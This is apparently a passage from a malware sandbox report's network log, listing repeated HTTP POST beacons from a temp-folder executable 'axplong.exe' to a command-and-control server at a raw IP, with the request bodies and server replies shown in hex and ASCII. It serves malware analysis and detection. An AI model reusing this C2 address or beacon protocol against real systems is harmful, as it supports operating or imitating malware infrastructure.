Aug 19, 2024 06:05:22.226727009 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Aug 19, 2024 06:05:22.226747036 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Aug 19, 2024 06:05:22.226784945 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	49805	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:22.371018887 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:23.116455078 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	49806	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:23.149142027 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:23.919296980 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	49807	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:24.031250954 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:24.785573959 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:05:24.801116943 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:25.049904108 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	49808	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:25.172677994 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:25.931037903 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:05:25.934346914 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:26.184016943 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	49809	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:26.321974039 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:27.068691015 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:05:27.075248003 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:27.350570917 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	49810	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:27.472063065 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:28.249026060 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:05:28.255187988 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:28.588134050 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	49811	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:28.707921028 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:29.515255928 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:05:29.521100998 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:29.772826910 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	49812	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:29.906773090 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:30.655612946 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	49813	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:30.665323019 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:31.417057991 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	49814	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:31.564009905 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:32.313817024 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	49815	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:32.327714920 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:33.092701912 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	49816	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:33.224997997 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:33.983516932 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	49817	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:34.095273972 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:35.003401041 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	49818	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:35.131999969 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:35.923862934 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	49819	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:35.939166069 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:36.693325043 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	49820	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:36.823158979 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:37.611102104 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	49821	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:37.622591972 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:38.378863096 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	49822	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:38.501614094 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:39.277391911 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	49823	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
